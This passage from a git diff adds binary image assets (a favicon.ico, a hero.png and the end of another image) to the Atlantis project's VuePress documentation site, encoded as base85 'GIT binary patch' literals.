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

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/favicon.ico b/runatlantis.io/.vuepress/public/favicon.ico
new file mode 100644
index 0000000000000000000000000000000000000000..23dc683f76edbf1e595a6967c10b11037b1d5af0
GIT binary patch
literal 34494
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

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/hero.png b/runatlantis.io/.vuepress/public/hero.png
new file mode 100644
index 0000000000000000000000000000000000000000..748e26771af638c3dea9a2c31626213b7e43bf38
GIT binary patch
literal 14750
zcmV;PIbp_$P)<h;3K|Lk000e1NJLTq008g+008g^1^@s6K2_<G0022<Nkl<Zc-rlK
z2Y8g%mG;<ioK4m#&aU&vDVt5=-Di{RCi|>oJ5B(JDtZ^a8Uv;Z(N#yiOi`mFX;eT0
zL<iGE5g<Ak5Sp3qn;D7TOfg_O(&+u~`DO$H)HQwXd7k$Xk_OE;_n!Bja?d?iCgb8V
zA_v}-Yw@=H)SaKipLzVdBoTjAh!vfcBE~56=4hp0&SLmdWvD7vid82WM74<XDiPP&
z*W2uO_f%rl1C;@f)doCcFf&v#JYlbS$bR=Nd)*zCXuiq*eMKdh%h=a53`g1Tcd_?b
zrPP~KmHNu*Y9sn7^zez*<G&f+mlxq3>Dkyb@|oho1$ZOPgzqs@yc2&0?<%wpey-3z
z`#*(<VM-I?7ztNdiFKV3u!;c=MwLpy*X$XN(X%KFh^J>$nAkJ2XN|vrcj?*bGtg(@
z6UxP-#lHaGNjz}#hp}hz|DsFr`ve18DTK-?j37&yB`jvv^M=)0!o^WZ&&sU-0eW`&
z4D?x|P53>1w!{PYA$?Xp<6PWcl-Kdk>QelgDfnL!^cCHh8yu<>&1;xNGco0_a09Y7
z3iMeRsmtiI(PyO3N}riNJB<O?1TO9o!xrJKI1}DW5b!_oLPe)U5rNFQ<|~D&awoaL
z&O#M^W~I)&g2q6>#)8H~UV@*|7;#PE;!=sHIMe<261C4hR_HK{#f>VZh&{~3yrr@v
zk>KSp(^$}$(AdxzB^vNCEp$8~#>H6~s5j=6<Ht!%5gAEGG9*zPs}k{zms#4TC&t(q
zQ5K!XjE&z&r4FCaSn@;|7l(+#gx@C$7_2l@sa5)_A}LeLEp5}|W;SNlEH{l|5{+rR
z79Y^!$hC}%ZQbM(SAGyLz*lKN2(z>sn9`LoOH#p!XsaX`D%jYT)7a7&E7@4fuUz>7
z*E}vQBW?+P#@xI?Ou;k^$CN_VJx)0Lg2tG}S{id^m1z#RCUR+#s7^lqjY3yBK_yge
zU?6MzjK{VPkCmTEo(`J>X)g4Sf5SDCOT7}Wee!|QU=C7?*vn$HE1bA4LS!}<G$+ix
z4zk3_T)5Pbn9~n`snnb2C`I#eYbLpplgITcz@!Yeh~sRY=FpsR&Gm9gK8K&E_2x-*
zFo3yh_c?LhA$whArn#ayqq&PebN5}Y$=;Tn(&BBUu5y4{tUAryv!`ml4dj*uBGTNk
zIaHKZ4x~Bdn(g62MfS0!PyehG%!Ql)o|e5f7siTD|I80kc%aacw|D{nt`L#J+^?rx
z;XQRfx$3D>L@Ld-bj*>9drJXZjTKt_oK5OPmBD<TXOz7pbIs;jVK7gMJ@N4U0&bDr
zQ|1=meK%gLXs0q%tyhb9#1-4iz~-E})f-}U747HpM3;Lds1l9%L!w{~QHtg=Z>UpF
